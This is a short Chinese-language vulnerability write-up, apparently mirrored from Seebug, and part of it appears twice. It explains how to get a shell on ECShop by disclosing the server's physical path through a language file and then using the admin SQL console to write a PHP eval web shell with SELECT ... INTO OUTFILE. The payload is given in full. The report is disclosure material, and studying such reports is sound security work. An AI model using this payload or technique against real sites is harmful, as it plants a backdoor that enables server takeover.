VULHUB ™

### 简要描述： 非模板 ### 详细说明： 爆路径+sql命令执行=getshell 0x01.爆路径，得到物理路径 ``` http://127.0.0.1/ecshop/languages/en_us/common.php ``` [<img src="https://images.seebug.org/upload/201305/291249512cab52a7902db11104118947238fe75f.jpg" alt="w01.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/291249512cab52a7902db11104118947238fe75f.jpg) 0x02.后台sql语句执行处，into outfile写文件，配合上步得到的物理路径拿shell 在sql语句处输入： ``` select "<?php @eval($_POST['c']);?>" into outfile '物理路径//test.php'; ``` [<img src="https://images.seebug.org/upload/201305/2912524761a3032f832eb6cd1cc667c01a4821b8.jpg" alt="w02.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/2912524761a3032f832eb6cd1cc667c01a4821b8.jpg) 0x03.提交执行，接下来，mysql报错了 [<img src="https://images.seebug.org/upload/201305/29125324844fbb35e9541dd3505142151c95b54e.jpg" alt="w03.jpg" width="600"...

### 简要描述： 非模板 ### 详细说明： 爆路径+sql命令执行=getshell 0x01.爆路径，得到物理路径 ``` http://127.0.0.1/ecshop/languages/en_us/common.php ``` [<img src="https://images.seebug.org/upload/201305/291249512cab52a7902db11104118947238fe75f.jpg" alt="w01.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/291249512cab52a7902db11104118947238fe75f.jpg) 0x02.后台sql语句执行处，into outfile写文件，配合上步得到的物理路径拿shell 在sql语句处输入： ``` select "<?php @eval($_POST['c']);?>" into outfile '物理路径//test.php'; ``` [<img src="https://images.seebug.org/upload/201305/2912524761a3032f832eb6cd1cc667c01a4821b8.jpg" alt="w02.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/2912524761a3032f832eb6cd1cc667c01a4821b8.jpg) 0x03.提交执行，接下来，mysql报错了 [<img src="https://images.seebug.org/upload/201305/29125324844fbb35e9541dd3505142151c95b54e.jpg" alt="w03.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/29125324844fbb35e9541dd3505142151c95b54e.jpg) 0x04.再去看看，可爱的shell已经在那里了 [<img src="https://images.seebug.org/upload/201305/291254004ba2c082864e3ed05d8b008176123e86.jpg" alt="w04.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/291254004ba2c082864e3ed05d8b008176123e86.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201305/291255493f34cd6ab97ee03312acfd1bba70c66c.jpg" alt="w04.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/291255493f34cd6ab97ee03312acfd1bba70c66c.jpg)